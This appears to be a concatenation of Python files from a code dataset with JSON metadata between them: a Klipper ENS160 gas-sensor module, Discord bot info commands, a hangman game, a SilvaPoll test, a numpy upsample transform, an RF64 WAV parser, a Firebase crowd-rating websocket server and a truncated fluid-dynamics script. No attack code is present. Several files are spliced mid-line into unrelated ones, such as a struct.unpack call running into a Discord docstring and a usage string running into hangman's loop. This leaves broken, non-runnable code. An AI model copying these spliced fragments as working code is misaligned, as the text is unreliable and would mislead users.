gcmd\n })\n else:\n gcmd.respond_info(\"ens160 {}: csv_basename not specified\"\n .format(self.name))\n\n def handle_connect(self):\n self.ens160 = DFRobot_ENS160(self.i2c, self.reactor)\n\n if self.temperature_sensor_name:\n self.temperature_sensor = self.printer.lookup_object(\n self.temperature_sensor_name)\n\n if self.humidity_sensor_name:\n self.humidity_sensor = self.printer.lookup_object(\n self.humidity_sensor_name)\n\n if self.csv_basename:\n threading.Thread(target=csv_logger, args=(\n self.name, self.csv_basename,\n self.reactor, self.csv_log_queue)).start()\n\n self.reactor.update_timer(self.sample_timer, self.reactor.NOW)\n\n def sample_ens160(self, eventtime):\n measured_time = self.reactor.monotonic()\n\n # update ens160 temp/humidity to aid with measurement compensation\n temperature_status = self.temperature_sensor.get_status(eventtime) \\\n if self.temperature_sensor \\\n else {self.temperature_key: self.temperature_initial}\n tempC = temperature_status[self.temperature_key]\n humidity_status = self.humidity_sensor.get_status(eventtime) \\\n if self.humidity_sensor \\\n else {self.humidity_key: self.humidity_initial}\n humidity = humidity_status[self.humidity_key]\n\n try:\n # require both temperature/humidity to update ens160 compensation\n if tempC and humidity:\n self.ens160.set_temp_and_hum(tempC, humidity)\n\n # perform measurement\n status, aqi, self.TVOC, self.eCO2 = self.ens160.air_quality()\n hydrogen, acetone, carbon_monoxide, toluene = self.ens160.raw()\n except Exception as err:\n logging.exception(\n \"ens160 {}: Error reading data - {}\".format(self.name, err))\n self.eCO2 = self.TVOC = .0\n return self.reactor.NEVER\n\n # log measurement to syslog\n now = self.reactor.monotonic()\n if self.syslog_time > 0:\n if now - self.syslog_last_updated > self.syslog_time:\n logging.info(\"ens160 {}: measured - AQI: {}, eCO2: {}, TVOC: {}\"\n .format(self.name, aqi, self.eCO2, self.TVOC))\n self.syslog_last_updated = now\n\n # log measurement to csv\n if self.csv_basename:\n self.csv_log_queue.put_nowait({\n \"type\": \"update\",\n \"monotonic\": now,\n \"status\": status,\n \"aqi\": aqi,\n \"eco2\": self.eCO2,\n \"tvoc\": self.TVOC,\n \"hydrogenRaw\": hydrogen,\n \"acetoneRaw\": acetone,\n \"carbonMonoxideRaw\": carbon_monoxide,\n \"tolueneRaw\": toluene,\n \"temperature\": temperature_status,\n \"humidity\": humidity_status\n })\n\n # schedule next loop\n return measured_time + self.report_time\n\n def get_status(self, eventtime):\n return {\n 'eco2': self.eCO2,\n 'tvoc': self.TVOC,\n }\n\n\ndef csv_logger(name, basename, reactor, data_queue):\n try:\n def gcmd_result(gcmd, val):\n reactor.register_async_callback((lambda e: gcmd.respond_info(val)))\n\n csvfile = None\n csvwriter = None\n while True:\n item = data_queue.get()\n item_type = item['type']\n if item_type == \"start\":\n if not csvfile:\n filename = basename + datetime.datetime.now().strftime(\n \"_%Y-%m-%d_%H-%M-%S.csv\")\n csvfile = open(filename, 'w')\n gcmd_result(item['gcmd'],\n \"ens160 {}: csv logging started '{}'\"\n .format(name, filename))\n else:\n gcmd_result(item['gcmd'],\n \"ens160 {}: csv logging already started\"\n .format(name))\n elif item_type == \"stop\":\n if csvfile:\n csvfile.close()\n csvfile = None\n csvwriter = None\n gcmd_result(item['gcmd'],\n \"ens160 {}: csv logging stopped\".format(name))\n else:\n gcmd_result(item['gcmd'],\n \"ens160 {}: csv logging already stopped\"\n .format(name))\n elif item_type == \"update\" and csvfile:\n t = item['temperature']\n h = item['humidity']\n\n if not csvwriter:\n csvwriter = csv.writer(csvfile)\n row = ['unix_time', 'monotonic_time', 'AQI', 'ECO2', 'TVOC',\n 'hydrogen_raw', 'acetone_raw', 'carbon_monoxide_raw',\n 'toluene_raw']\n row.extend(\"temperature_{}\".format(x) for x in sorted(t))\n row.extend(\"humidity_{}\".format(x) for x in sorted(h))\n csvwriter.writerow(row)\n\n row = [time.time(), item['monotonic'], item['aqi'],\n item['eco2'], item['tvoc'], item['hydrogenRaw'],\n item['acetoneRaw'], item['carbonMonoxideRaw'],\n item['tolueneRaw']]\n row.extend(t[k] for k in sorted(t))\n row.extend(h[k] for k in sorted(h))\n csvwriter.writerow(row)\n csvfile.flush()\n\n data_queue.task_done()\n except Exception as err:\n logging.exception(\"ens160 {}: csv error - {}\".format(name, err))\n\n\n# The DFRobot_ENS160 class is heavily inspired/taken from\n\n'''!\n @file DFRobot_ENS160.py\n @brief Define infrastructure of DFRobot_ENS160 class\n @details This is a Digital Metal-Oxide Multi-Gas Sensor. It can be controlled by I2C and SPI port.\n @n Detection of a variety of gases, such as volatile organic compounds (VOCs), including ethanol,\n @n toluene, as well as hydrogen and nitrogen dioxide, has superior selectivity and accuracy.\n @copyright Copyright (c) 2010 DFRobot Co.Ltd (http://www.dfrobot.com)\n @license The MIT License (MIT)\n @author [qsjhyy](yihuan.huang@dfrobot.com)\n @version V1.0\n @date 2021-10-28\n @url https://github.com/DFRobot/DFRobot_ENS160\n'''\n\n\nENS160_I2CADDR_DEFAULT = 0x53\n\nENS160_PART_ID = 0x0160\n\n# ENS160 register address\n\n# This 2-byte register contains the part number in little endian of the ENS160.\nENS160_PART_ID_REG = 0x00\n# This 1-byte register sets the Operating Mode of the ENS160.\nENS160_OPMODE_REG = 0x10\n# This 1-byte register configures the action of the INTn pin.\nENS160_CONFIG_REG = 0x11\n# This 1-byte register allows some additional commands to be executed on the ENS160.\nENS160_COMMAND_REG = 0x12\n# This 2-byte register allows the host system to write ambient temperature data to ENS160 for compensation.\nENS160_TEMP_IN_REG = 0x13\n# This 2-byte register allows the host system to write relative humidity data to ENS160 for compensation.\nENS160_RH_IN_REG = 0x15\n# This 1-byte register indicates the current STATUS of the ENS160.\nENS160_DATA_STATUS_REG = 0x20\n# This 1-byte register reports the calculated Air Quality Index according to the UBA.\nENS160_DATA_AQI_REG = 0x21\n# This 2-byte register reports the calculated TVOC concentration in ppb.\nENS160_DATA_TVOC_REG = 0x22\n# This 2-byte register reports the calculated equivalent CO2-concentration in ppm, based on the detected VOCs and hydrogen.\nENS160_DATA_ECO2_REG = 0x24\n# This 2-byte register reports the calculated ethanol concentration in ppb.\nENS160_DATA_ETOH_REG = 0x22\n# This 2-byte register reports the temperature used in its calculations (taken from TEMP_IN, if supplied).\nENS160_DATA_T_REG = 0x30\n# This 2-byte register reports the relative humidity used in its calculations (taken from RH_IN if supplied).\nENS160_DATA_RH_REG = 0x32\n# This 1-byte register reports the calculated checksum of the previous DATA_ read transaction (of n-bytes).\nENS160_DATA_MISR_REG = 0x38\n# This 8-byte register is used by several functions for the Host System to pass data to the ENS160.\nENS160_GPR_WRITE_REG = 0x40\n# This 8-byte register is used by several functions for the ENS160 to pass data to the Host System.\nENS160_GPR_READ_REG = 0x48\n\n# OPMODE(Address 0x10) register mode\nENS160_SLEEP_MODE = 0x00 # DEEP SLEEP mode (low power standby).\nENS160_IDLE_MODE = 0x01 # IDLE mode (low-power).\nENS160_STANDARD_MODE = 0x02 # STANDARD Gas Sensing Modes.\n\n\nclass DFRobot_ENS160:\n def __init__(self, i2c, reactor):\n self._i2c = i2c\n self._reactor = reactor\n\n # 100ms delay to wake up\n self._reactor.pause(self._reactor.monotonic() + 0.1)\n\n part_id = self.part_id()\n if part_id != ENS160_PART_ID:\n raise RuntimeError(\n \"Expected ENS160 part id: 0x{:04X}, got 0x{:04X}\"\n .format(ENS160_PART_ID, part_id))\n\n self.set_PWR_mode(ENS160_STANDARD_MODE)\n self.set_INT_mode(0x02)\n\n def part_id(self):\n params = self._i2c.i2c_read([ENS160_PART_ID_REG], 2)\n return struct.unpack(' | | ]\n Description:\n Provides information about the given role.\n \"\"\"\n server_roles = sorted(ctx.server.roles, key=lambda role: role.position)\n\n if ctx.arg_str.strip() == \"\":\n await ctx.pager(ctx.paginate_list([role.name for role in reversed(server_roles)]))\n return\n role = await ctx.find_role(ctx.arg_str, create=False, interactive=True)\n if role is None:\n return\n\n title = \"{role.name} (id: {role.id})\".format(role=role)\n\n colour = role.colour if role.colour.value else discord.Colour.light_grey()\n num_users = len([user for user in ctx.server.members if (role in user.roles)])\n created_ago = \"({} ago)\".format(ctx.strfdelta(datetime.utcnow() - role.created_at, minutes=False))\n created = role.created_at.strftime(\"%I:%M %p, %d/%m/%Y\")\n hoisted = \"Yes\" if role.hoist else \"No\"\n mentionable = \"Yes\" if role.mentionable else \"No\"\n\n prop_list = [\"Colour\", \"Hoisted\", \"Mentionable\", \"Number of members\", \"Created at\", \"\"]\n value_list = [str(role.colour), hoisted, mentionable, num_users, created, created_ago]\n desc = ctx.prop_tabulate(prop_list, value_list)\n\n pos = role.position\n position = \"```markdown\\n\"\n for i in reversed(range(-3, 4)):\n line_pos = pos + i\n if line_pos < 0:\n break\n if line_pos >= len(server_roles):\n continue\n position += \"{0:<4}{1}{2:<20}\\n\".format(str(line_pos) + \".\", \" \" * 4 + (\">\" if str(server_roles[line_pos]) == str(role) else \" \"), str(server_roles[line_pos]))\n position += \"```\"\n if role > ctx.author.top_role:\n diff_str = \"(Higher than your highest role)\"\n elif role < ctx.author.top_role:\n diff_str = \"(Lower than your highest role)\"\n elif role == ctx.author.top_role:\n diff_str = \"(This is your highest role!)\"\n position += diff_str\n\n embed = discord.Embed(title=title, colour=colour, description=desc)\n# embed.set_thumbnail(url=thumbnail)\n emb_fields = [(\"Position in the hierarchy\", position, 0)]\n await ctx.emb_add_fields(embed, emb_fields)\n out_msg = await ctx.reply(embed=embed, dm=ctx.bot.objects[\"brief\"])\n if out_msg and ctx.bot.objects[\"brief\"]:\n await ctx.confirm_sent(reply=\"Roleinfo sent!\")\n\n\n@cmds.cmd(name=\"rolemembers\",\n category=\"Info\",\n short_help=\"Lists members with a particular role.\",\n edit_handler=cmds.edit_handler_rerun,\n aliases=[\"rolemems\", \"whohas\"])\n@cmds.require(\"in_server\")\nasync def cmd_rolemembers(ctx):\n \"\"\"\n Usage:\n {prefix}rolemembers [ | | ]\n Description:\n Lists the users with this role.\n \"\"\"\n\n if ctx.arg_str.strip() == \"\":\n await ctx.reply(\"Please give me a role to list the members of.\")\n return\n\n role = await ctx.find_role(ctx.arg_str, create=False, interactive=True)\n if role is None:\n return\n\n members = [str(mem) for mem in ctx.server.members if role in mem.roles]\n if len(members) == 0:\n await ctx.reply(\"No members have this role.\")\n return\n\n out_msg = await ctx.pager(ctx.paginate_list(members, title=\"Members in {}\".format(role.name)), dm=ctx.bot.objects[\"brief\"])\n if out_msg and ctx.bot.objects[\"brief\"]:\n await ctx.confirm_sent(reply=\"Rolemembers sent!\")\n\n\n@cmds.cmd(\"userinfo\",\n category=\"Info\",\n short_help=\"Shows the user's information\",\n edit_handler=cmds.edit_handler_rerun,\n aliases=[\"uinfo\", \"ui\", \"user\"])\n@cmds.require(\"in_server\")\n@cmds.execute(\"user_lookup\", in_server=True, greedy=True)\nasync def cmd_userinfo(ctx):\n \"\"\"\n Usage:\n {prefix}userinfo [user]\n Description:\n Sends information on the provided user, or yourself.\n \"\"\"\n user = ctx.author\n if ctx.arg_str != \"\":\n user = ctx.objs[\"found_user\"]\n if not user:\n await ctx.reply(\"No matching users found!\")\n return\n # Manually get a new user in case the old one was out of date\n new_user = await ctx.bot.get_user_info(user.id)\n\n avlink = await ctx.get_avatar(new_user)\n bot_emoji = ctx.bot.objects[\"emoji_bot\"]\n statusdict = {\"offline\": (\"Offline/Invisible\", ctx.bot.objects[\"emoji_offline\"]),\n \"dnd\": (\"Do Not Disturb\", ctx.bot.objects[\"emoji_dnd\"]),\n \"online\": (\"Online\", ctx.bot.objects[\"emoji_online\"]),\n \"idle\": (\"Idle/Away\", ctx.bot.objects[\"emoji_idle\"])}\n colour = (user.colour if user.colour.value else discord.Colour.light_grey())\n\n name = \"{} {}\".format(user, bot_emoji if user.bot else \"\")\n game = user.game if user.game else \"Nothing\"\n status = \"{1}{0}\".format(*statusdict[str(user.status)])\n shared = \"{} servers\".format(len(list(filter(lambda m: m.id == user.id, ctx.bot.get_all_members()))))\n joined_ago = \"({} ago)\".format(ctx.strfdelta(datetime.utcnow() - user.joined_at, minutes=False))\n joined = user.joined_at.strftime(\"%I:%M %p, %d/%m/%Y\")\n created_ago = \"({} ago)\".format(ctx.strfdelta(datetime.utcnow() - user.created_at, minutes=False))\n created = user.created_at.strftime(\"%I:%M %p, %d/%m/%Y\")\n usernames = await ctx.bot.data.users_long.get(user.id, \"name_history\")\n name_list = \"{}{}\".format(\"..., \" if len(usernames) > 10 else \"\",\n \", \".join(usernames[-10:])) if usernames else \"No recent past usernames.\"\n nicknames = await ctx.bot.data.members_long.get(ctx.server.id, user.id, \"nickname_history\")\n nickname_list = \"{}{}\".format(\"..., \" if len(nicknames) > 10 else \"\",\n \", \".join(nicknames[-10:])) if nicknames else \"No recent past nicknames.\"\n \"\"\"\n # Last status stuff is disabled for now\n last_status = await ctx.bot.data.users.get(user.id, \"old_status\")\n if last_status:\n status_str = \"(Was {})\".format(statusdict[last_status[0]][0])\n last_seen = int(datetime.utcnow().strftime('%s')) - last_status[2]\n if last_seen > 60:\n seen_ago = \"{} ago\".format(ctx.strfdelta(timedelta(seconds=last_seen)))\n else:\n seen_ago = \"Now\"\n# last_seen = \"{}, {}\".format(seen_ago, status_str)\n else:\n seen_ago = \"No status changes seen!\"\n status_str = \"\"\n prop_list = [\"Full name\", \"Nickname\", \"Names\", \"Nicknames\", \"Status\", \"Playing\", \"Seen in\", \"Last seen\", \"\", \"Joined at\", \"\", \"Created at\", \"\"]\n value_list = [name, user.display_name, name_list, nickname_list, status, game, shared, seen_ago, status_str, joined, joined_ago, created, created_ago]\n \"\"\"\n\n prop_list = [\"Full name\", \"Nickname\", \"Names\", \"Nicknames\", \"Status\", \"Playing\", \"Seen in\", \"Joined at\", \"\", \"Created at\", \"\"]\n value_list = [name, user.display_name, name_list, nickname_list, status, game, shared, joined, joined_ago, created, created_ago]\n desc = ctx.prop_tabulate(prop_list, value_list)\n\n roles = [r.name for r in user.roles if r.name != \"@everyone\"]\n roles = ('`' + '`, `'.join(roles) + '`') if roles else \"None\"\n\n joined = sorted(ctx.server.members, key=lambda mem: mem.joined_at)\n pos = joined.index(user)\n positions = []\n for i in range(-3, 4):\n line_pos = pos + i\n if line_pos < 0:\n continue\n if line_pos >= len(joined):\n break\n positions.append(\"{0:<4}{1}{2:<20}\".format(str(line_pos + 1) + \".\", \" \" * 4 + (\">\" if joined[line_pos] == user else \" \"), str(joined[line_pos])))\n join_seq = \"```markdown\\n{}\\n```\".format(\"\\n\".join(positions))\n\n embed = discord.Embed(type=\"rich\", color=colour, description=desc)\n embed.set_author(name=\"{user.name} (id: {user.id})\".format(user=new_user),\n icon_url=avlink,\n url=avlink)\n embed.set_thumbnail(url=avlink)\n\n emb_fields = [(\"Roles\", roles, 0), (\"Join order\", join_seq, 0)]\n await ctx.emb_add_fields(embed, emb_fields)\n\n out_msg = await ctx.reply(embed=embed, dm=ctx.bot.objects[\"brief\"])\n if out_msg and ctx.bot.objects[\"brief\"]:\n await ctx.confirm_sent(reply=\"Userinfo sent!\")\n\n\n@cmds.cmd(\"serverinfo\",\n category=\"Info\",\n short_help=\"Shows server info.\",\n edit_handler=cmds.edit_handler_rerun,\n aliases=[\"sinfo\", \"si\"])\n@cmds.execute(\"flags\", flags=[\"icon\"])\n@cmds.require(\"in_server\")\nasync def cmd_serverinfo(ctx):\n \"\"\"\n Usage:\n {prefix}serverinfo [--icon]\n Description:\n Shows information about the server you are in.\n With --icon, just displays the server icon.\n \"\"\"\n if ctx.flags[\"icon\"]:\n embed = discord.Embed(color=discord.Colour.light_grey())\n embed.set_image(url=ctx.server.icon_url)\n\n out_msg = await ctx.reply(embed=embed, dm=ctx.bot.objects[\"brief\"])\n if out_msg and ctx.bot.objects[\"brief\"]:\n await ctx.confirm_sent(reply=\"Icon sent!\")\n return\n\n region = str(ctx.server.region) if not str(ctx.server.region) in ctx.bot.objects[\"regions\"] else ctx.bot.objects[\"regions\"][str(ctx.server.region)]\n ver = {\n \"none\": \"None\",\n \"low\": \"Level 1 (Must have a verified email)\",\n \"medium\": \"Level 2 (Registered for more than 5 minutes)\",\n \"high\": \"Level 3 (Member for more than 10 minutes)\",\n \"4\": \"Level 4 (Verified phone number)\"\n }\n\n mfa = {\n 0: \"Disabled\",\n 1: \"Enabled\"\n }\n\n text = len([c for c in ctx.server.channels if c.type == discord.ChannelType.text])\n voice = len([c for c in ctx.server.channels if c.type == discord.ChannelType.voice])\n total = text + voice\n\n online = 0\n idle = 0\n offline = 0\n dnd = 0\n for m in ctx.server.members:\n if m.status == discord.Status.online:\n online = online + 1\n elif m.status == discord.Status.idle:\n idle = idle + 1\n elif m.status == discord.Status.offline:\n offline = offline + 1\n elif m.status == discord.Status.dnd:\n dnd = dnd + 1\n\n Online = ctx.bot.objects[\"emoji_online\"]\n Idle = ctx.bot.objects[\"emoji_idle\"]\n Dnd = ctx.bot.objects[\"emoji_dnd\"]\n Offline = ctx.bot.objects[\"emoji_offline\"]\n\n server_owner = ctx.server.owner\n owner = \"{} (id: {})\".format(server_owner, server_owner.id)\n members = \"{} humans, {} bots | {} total\".format(str(len([m for m in ctx.server.members if not m.bot])),\n str(len([m for m in ctx.server.members if m.bot])),\n ctx.server.member_count)\n created = ctx.server.created_at.strftime(\"%I:%M %p, %d/%m/%Y\")\n created_ago = \"({} ago)\".format(ctx.strfdelta(datetime.utcnow() - ctx.server.created_at, minutes=False))\n channels = \"{} text, {} voice | {} total\".format(text, voice, total)\n status = \"{} - **{}**\\n{} - **{}**\\n{} - **{}**\\n{} - **{}**\".format(Online, online, Idle, idle, Dnd, dnd, Offline, offline)\n avatar_url = ctx.server.icon_url\n icon = \"[Icon Link]({})\".format(avatar_url)\n is_large = \"More than 250 members\" if ctx.server.large else \"Less than 250 members\"\n\n prop_list = [\"Owner\", \"Region\", \"Icon\", \"Large server?\", \"Verification\", \"2FA\", \"Roles\", \"Members\", \"Channels\", \"Created at\", \"\"]\n value_list = [owner,\n region,\n icon,\n is_large,\n ver[str(ctx.server.verification_level)],\n mfa[ctx.server.mfa_level],\n len(ctx.server.roles),\n members, channels, created, created_ago]\n desc = ctx.prop_tabulate(prop_list, value_list)\n\n embed = discord.Embed(color=server_owner.colour if server_owner.colour.value else discord.Colour.teal(), description=desc)\n embed.set_author(name=\"{} (id: {})\".format(ctx.server, ctx.server.id))\n embed.set_thumbnail(url=avatar_url)\n\n emb_fields = [(\"Member Status\", status, 0)]\n\n await ctx.emb_add_fields(embed, emb_fields)\n out_msg = await ctx.reply(embed=embed, dm=ctx.bot.objects[\"brief\"])\n if out_msg and ctx.bot.objects[\"brief\"]:\n await ctx.confirm_sent(reply=\"Serverinfo sent!\")\n\n\n@cmds.cmd(\"channelinfo\",\n category=\"Info\",\n short_help=\"Displays information about a channel.\",\n edit_handler=cmds.edit_handler_rerun,\n aliases=[\"ci\"])\n@cmds.require('in_server')\nasync def cmd_channelinfo(ctx):\n \"\"\"\n Usage:\n {prefix}channelinfo [ | | 0 and \"_\" in guess:\n print(\"You have \" + str(lives) + \" lives left...\")\n \n # 2. Take the guess from the user\n user_input = input(\"Guess a character (also whitespace): \").lower()\n \n # 3. Find all indices where the guessed character occurs in the solution\n indices = []\n for i in range(len(solution)):\n if solution[i]==user_input:\n indices += [i]\n \n # 4. Test whether the guessed character didn't occur -- reduce lives if so\n if len(indices)==0:\n lives = lives - 1\n \n # 5. Fill in the guess at all correct indices\n for index in indices:\n guess = guess[:index] + user_input + guess[index+1:]\n \n # 6. Output current (partial) solutions\n print(\"The secret phrase:\")\n output = \"\"\n for c in guess:\n output += c + \" \"\n print(output)\n print(\"\")\n\n# 7. Successfull termination? \nif lives==0:\n print(\"Game over!\")\nelse:\n print(\"You won!\")","repo_name":"karthick90/python-workout","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8509016991","text":"import unittest\n\nfrom zope.interface.verify import verifyObject\nfrom silva.core.interfaces import IPublicationWorkflow\nfrom Products.Silva.ftesting import public_settings\nfrom Products.SilvaPoll.interfaces import IPollQuestion, IPollQuestionVersion\nfrom Products.SilvaPoll.testing import FunctionalLayer\n\n\ndef poll_settings(browser):\n public_settings(browser)\n browser.inspect.add('title', css='.poll h1')\n browser.inspect.add('vote_question', css='.poll h2')\n browser.inspect.add('results_question', css='.poll h3')\n browser.inspect.add('forms', css='form.poll-form', type='form')\n\n\nclass QuestionTestCase(unittest.TestCase):\n layer = FunctionalLayer\n\n def setUp(self):\n self.root = self.layer.get_application()\n self.layer.login('editor')\n\n def test_question(self):\n \"\"\"Test content type.\n \"\"\"\n factory = self.root.manage_addProduct['SilvaPoll']\n factory.manage_addPollQuestion('poll', 'Poll Status')\n\n self.assertTrue('poll' in self.root.objectIds())\n poll = self.root.poll\n self.assertTrue(verifyObject(IPollQuestion, poll))\n\n version = poll.get_editable()\n self.assertTrue(verifyObject(IPollQuestionVersion, version))\n version.set_title('New Poll')\n version.set_question('Does it poll ?')\n version.set_answers(['Yeah baby', 'Well, not really'])\n\n self.assertEqual(version.get_title(), 'New Poll')\n self.assertEqual(version.get_question(), 'Does it poll ?')\n self.assertEqual(version.get_answers(),\n ['Yeah baby', 'Well, not really'])\n\n def test_view(self):\n \"\"\"Test public view.\n \"\"\"\n factory = self.root.manage_addProduct['SilvaPoll']\n factory.manage_addPollQuestion('poll', 'Poll Status')\n version = self.root.poll.get_editable()\n version.set_title('New Poll')\n version.set_question('Does it poll ?')\n version.set_answers(['Yeah baby', 'Well, not really'])\n IPublicationWorkflow(self.root.poll).publish()\n\n with self.layer.get_browser(poll_settings) as browser:\n self.assertEqual(browser.open('/root/poll'), 200)\n self.assertEqual(browser.inspect.title, ['New Poll'])\n self.assertEqual(browser.inspect.vote_question, ['Does it poll ?'])\n self.assertEqual(len(browser.inspect.forms), 1)\n form = browser.inspect.forms[0]\n self.assertIn('answer', form.controls)\n self.assertIn('submit', form.controls)\n self.assertEqual(\n form.controls['answer'].options,\n ['Yeah baby', 'Well, not really'])\n form.controls['answer'].value = 'Yeah baby'\n self.assertEqual(\n form.controls['submit'].click(),\n 200)\n self.assertEqual(browser.inspect.title, ['New Poll'])\n self.assertEqual(browser.inspect.results_question,\n ['Does it poll ?'])\n self.assertEqual(len(browser.inspect.forms), 0)\n\n\ndef test_suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(QuestionTestCase))\n return suite\n","repo_name":"silvacms/Products.SilvaPoll","sub_path":"Products/SilvaPoll/tests/test_questions.py","file_name":"test_questions.py","file_ext":"py","file_size_in_byte":3173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29656086090","text":"from typing import Optional\nimport numpy as np\nfrom .base import TRANSFORMATIONS, BaseTransformation\n\n\n@TRANSFORMATIONS.register_module('upsample')\nclass UpsampleTransformation(BaseTransformation):\n def __init__(\n self,\n axis: int,\n ratio: Optional[int] = 1,\n ):\n super().__init__()\n self.axis = axis\n self.ratio = ratio\n\n def transform(self, data):\n assert data.ndim > self.axis >= -data.ndim, \"upsampling index out of range\"\n x = np.arange(data.shape[self.axis])\n new_x = np.linspace(0, data.shape[self.axis] - 1, self.ratio * data.shape[self.axis])\n new_data = np.apply_along_axis(lambda y: np.interp(new_x, x, y), self.axis, data)\n return new_data\n\n def shape_transform(self, shape):\n shape[self.axis] *= self.ratio\n return shape\n\n def __repr__(self):\n return f'Upsample Transformation | Axis: {self.axis} | Ratio: {self.ratio}'\n","repo_name":"microsoft/PhysioPro","sub_path":"physiopro/dataset/transformation/upsample.py","file_name":"upsample.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"28765314261","text":"import struct\nfrom collections import namedtuple\nfrom . import riff_parser\n\nRF64Context = namedtuple('RF64Context','sample_count bigchunk_table')\n\n\ndef parse_rf64(stream, signature = b'RF64'):\n # print(\"starting parse_rf64\")\n start = stream.tell()\n assert( stream.read(4) == b'WAVE' )\n\n ds64_chunk = riff_parser.parse_chunk(stream)\n\n ds64_field_spec = \"= ds64_fields_size )\n\n # print(\"Read ds64 chunk: len()\",len(ds64_data))\n riff_size, data_size, sample_count, length_lookup_table = struct.unpack( ds64_field_spec , ds64_data[0:ds64_fields_size] )\n\n bigchunk_table = {}\n chunksize64format = \"<4sL\"\n chunksize64size = struct.calcsize(chunksize64format)\n # print(\"Found chunks64s:\", length_lookup_table)\n\n for n in range(length_lookup_table):\n bigname, bigsize = struct.unpack_from( chunksize64format , ds64_data, offset= ds64_fields_size )\n bigchunk_table[bigname] = bigsize\n\n bigchunk_table[b'data'] = data_size\n bigchunk_table[signature] = riff_size\n\n stream.seek(start, 0)\n # print(\"returning from parse_rf64, context: \", RF64Context(sample_count=sample_count, bigchunk_table=bigchunk_table))\n return RF64Context( sample_count=sample_count, bigchunk_table=bigchunk_table )\n\n","repo_name":"iluvcapra/wavinfo","sub_path":"wavinfo/rf64_parser.py","file_name":"rf64_parser.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"40"} +{"seq_id":"34168741318","text":"# Import type hints\nfrom typing import Dict, List\n\n# Import database library\nimport firebase_admin as firebase\nfrom firebase_admin import firestore\n\n# Import library to make our API calls\nimport populartimes\n\n# Time (who would have guessed?)\nfrom time import time\nfrom datetime import datetime\n\n# Imports for frontend-backenc communication\nimport asyncio\nimport websockets\nimport math\n\n# Get the API key from the apiKey file\napiKeyFile = open(\"apiKey.txt\", \"r\")\n\nif apiKeyFile.mode == \"r\":\n apiKey = apiKeyFile.read()\n\n# Use a service account. The link needs to be a link to your credentials.\ncred = firebase.credentials.Certificate(\"dbauth.json\")\nfirebase.initialize_app(cred)\n\ndb = firestore.client()\n\ndef dbPush(locationID: str, value: int, collection: str):\n # PUSH TO DB\n doc_ref = db.collection(collection).document(locationID)\n # Updates DB if document exists, creates if it does not\n if doc_ref.get().exists:\n doc_ref.update({\n str(math.floor(time())): {\"value\": value}\n })\n else:\n doc_ref.set({\n str(math.floor(time())): {\"value\": value}\n })\n\ndef dbRead(document: str, collection: str):\n # Set up variables to read db and determine weighting\n doc_ref = db.collection(collection).document(document)\n doc = doc_ref.get()\n contents: Dict[str, Dict[str, int]] = doc.to_dict()\n total: float = 0\n totalWeight: float = 0\n\n # Determine weight of each entry based on how old it is\n if contents is None:\n return None\n for entryTime, entry in contents.items():\n weight: float = 1 - (time() - float(entryTime)) / 9000\n # Based on weight, either delete the entry or use the weight to determine how busy location is\n if weight < 0:\n doc_ref.update({\n entryTime: firestore.DELETE_FIELD\n })\n else:\n totalWeight += weight\n total += float(weight) * float(entry[\"value\"])\n # Prevents divide by zero errors\n if totalWeight == 0:\n return None\n total /= totalWeight\n return total\n\n\ndef getNearby(types: List[str], lat: float, lon: float):\n # Request from API information on nearby locations\n nearbyPlaces = populartimes.get(apiKey, types, (lat-0.005,lon-0.005), (lat+0.005,lon+0.005))\n return nearbyPlaces\n\nasync def onmessage(websocket, path: str):\n async for message in websocket:\n data: List[str] = message.split(\";\")\n # If server recieves request for nearby data...\n if data[0] == \"getRatings\":\n results = getNearby([data[3]], float(data[1]), float(data[2]))\n strData: str = \"\"\n for result in results:\n cur_pop: str = \"\"\n if \"current_popularity\" in result:\n cur_pop = result[\"current_popularity\"]\n elif \"populartimes\" in result: # fall back on average populartimes\n weekday: int = datetime.today().weekday()\n hour: int = datetime.now().hour\n cur_pop = result[\"populartimes\"][weekday][\"data\"][hour]\n strData += \";\" + result[\"name\"] + \" at \" + result[\"address\"] + \":\" + \\\n str(dbRead(result[\"id\"], \"userRatings\")) + \":\" + \\\n str(cur_pop) + \":\" + \\\n result[\"id\"] + \":\" + \\\n str(result[\"coordinates\"][\"lat\"]) + \":\" + \\\n str(result[\"coordinates\"][\"lng\"])\n # ...send data on locations to user\n await websocket.send(\"storeRatings\" + strData)\n # If server recieves user rating for a location\n elif data[0] == \"userRate\":\n # Push rating to database\n dbPush(data[1], int(data[2]), \"userRatings\")\n\n# Start websocket server\nasyncio.get_event_loop().run_until_complete(\n websockets.serve(onmessage, \"0.0.0.0\", 7030))\nasyncio.get_event_loop().run_forever()\n","repo_name":"VedaRePowered/easy-sparse-store-finder","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"71853411961","text":"#***********************Case test : Force and Coeff. Num.*********************\n#******************************************************************************\n\n# Tested on Python 2.7.16\n\n# Import library\nimport numpy as np\n\nrho = 1000.0 # fluid density\nnu = 1.007e-6 # fluid viscosity\n\n# Definition of diameters\nR1 = 1.0 # Rayon left static cylinder\nR2 = 1.0 # Rayon right moving cylinder\n\n# Definition of displacement\nKC = 1.0e-2 # Keulegan-Carpenter number KC= u/R2\nu = KC * R2 # module of displacement with u < 1e-2\nSk = 900.0 # Stokes number\nf = nu*Sk/(2*np.pi) # frequency of displacement (s^-1)\nT = 1.0/f # period of displacement\nOmega = Sk * nu / (R2**2.) # angular frequency of displacement (rad/s)\n\nprint('Stokes number Sk =', Sk)\nprint('Frequency F[1/s] =', f)\nprint('Pulsation w[rad/s] =', Omega)\nprint('Period T[s] =', T)\n\n\n\nt = np.loadtxt('TwoOscillatingCylinders_pb_Force_pression.out', unpack=True, usecols=[0]) # time\n\nt_adim = Omega*t # dimensionless time\n\n# Numerical\n\nFpx_left = np.loadtxt('TwoOscillatingCylinders_pb_Force_pression.out', unpack=True, usecols=[3]) # pressure x-axis for left cylinder\nFvx_left = np.loadtxt('TwoOscillatingCylinders_pb_Contrainte_visqueuse.out', unpack=True, 